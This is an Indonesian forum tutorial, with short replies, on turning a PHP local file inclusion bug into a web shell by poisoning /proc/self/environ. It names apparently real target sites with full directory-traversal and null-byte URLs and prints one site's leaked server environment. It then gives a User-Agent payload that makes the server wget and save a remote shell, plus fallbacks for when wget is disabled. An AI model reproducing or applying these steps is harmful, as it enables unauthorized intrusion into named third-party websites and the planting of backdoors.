UPLOAD SHELL VIA LFI MELALUI (Proc/Self/Environ)

OK.. w Coba Jelasin Cara Ini Kalo Salah Benerin Ya..

:D

LFI : LOCAL FILE INCLUDE

Bug Dimana User Dapat Menginclude Suatu File Ke Dalam File PHP.
Berikut Contoh Simpe Nya.

file xxx.php Mengandung code Berikut :

<?php include($_GET['i']); ?>

Kita Bisa Memanfaat kan nya dengan cara. http://site.com/xxx.php?i=[File Yang Ingin Di Include]

Bila Menemukan bug Ini ada 2 cara untuk meletakan Shell Ke Dalam Server.
yaitu :
LFI to RCE (REMOTE COMMAND EXECUTION) ATAU LEWAT PROC/SELF/ENVIRON

Sebener nya Di File Proc Self Environ Itu Ada BUG RCE :D

Tapi Kalo LFI to RCE kita harus menemukan Access Log yang ada di server..
Abis Itu Kita Racun Tuh LOG nya Biar Di Log Nya Ada Bug RCE.
Jelas Nya GOOGLING aja Yah Buat LFI to RCE :D

Kembali ke topik Upload Shell Dari File proc/self/environ

Misal Kita Nemu Bug LFI ..
http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=[LFI]
Dari Sini Kita Tes Ada GAg File Proc/self/environ nya.

http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00

%00 --> ini NULL Karakter Jadi Misalkan ada Karakter Sesudah NULL char ini Bakal Terhapus. :D

Dari Target Di Atas dapet Dah Tuh File Proc/Self/Environ :D

DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.wofchurchke.org�HTTP_KEEP_ALIVE=300�HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)�PATH=/bin:/usr/bin:/usr/local/bin�PATH_INFO=//index.php�PHPRC=/home/content/l/e/c/leconnections/html�QUERY_STRING=option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00�RAILS_ENV=production�REDIRECT_STATUS=200�REMOTE_ADDR=206.123.88.83�REMOTE_PORT=1560�REQUEST_METHOD=GET�REQUEST_URI=//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00�SCRIPT_FILENAME=/home/content/l/e/c/leconnections/html/wof//index.php�SCRIPT_NAME=//index.php�SERVER_ADDR=208.109.181.58�SERVER_ADMIN=support@supportwebsite.com�SERVER_NAME=www.wofchurchke.org�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=
Apache/1.3.33 Server at www.wofchurchke.org Port 80
SERVER_SOFTWARE=Apache�SPI=TRUE�SUBDOMAIN_DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html/wof�
Fatal error: Class 'GCalendarController../../../../../../../../../../../../../../../proc/self/environ' not found in /home/content/l/e/c/leconnections/html/wof/components/com_gcalendar/gcalendar.php on line 21

Dari Situ Kita inject pake Addons Tamper Data < MOZILLA >
Cari Di Google Ye "TAMPER DATA ADDON MOZILLA"


http://www.equip2conceal.com//index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00

Abis Itu Pastiin Target Nya Masih %00 Di Addres Bar Mozilla
Jangan Di Enter Dolo
Aktifin Tamper Data
Tools - Tamper Data - Start Tamper
Trus Klik Address Bar & Tekan ENTER.
Nanti Muncul Jendela Baru ( TAMPER WITH REQUEST )
Hilangin Cek List "continue tampering"
Pastikan Yg Di Tamper With Request itu Target Kita.
Kalo Bukan Klik Aja Submit.
nah Kalo Uda Bner Target Kita Langsung Klik Tamper.
Nanti Muncul Jendela Baru TAMPER POPUP
Di Bagian User-Agent Isi Nya
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)

Hapus Bagian Itu Trus Ganti Pake
<?system('wget http://<SHELL DALAM BENTUK TXT> -O OUTPUT.php');?>
Fungsi Nya Mengexekusi Perintah WGET yaitu
Server Nge Download http://<SHELL TXT> Dan Output Nya OUTPUT.php

Kalo Uda ya Di Cek Lah.

Misal Target Kita
http://www.xxx.com/xxx/xxx/?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00
Brarti Shell Kita Ada Di Sini http://www.xxx.com/xxx/xxx/OUTPUT.php
Poko Nya Di Path File Yg Ada Bug LFI nya Tersebut :D

Tapi Kalo Abis Di Tamper Ternyata Shell Kita Gag Ada Brarti Target Nya Uda Di Patch
Atau Perintah WGET di Disable / SAFE MODE Pada Server ON.
Kalo Wget Di Disable Coba Pake ( LWP-DOWNLOAD / FETCH )

SEKIAN MOGA SUKSES...

itu bukan upload om. tp itu download :roll:

keren ry

nyimak dulu.....

tp emang bner sih,,kyknya ini yg download

ijin belajar bang . . . :mbelajar: :mbelajar: :mbelajar:

lumayan nambah ilmu . . .

udah nyoba gagal bingung banget kak coba terus ah sampe bisa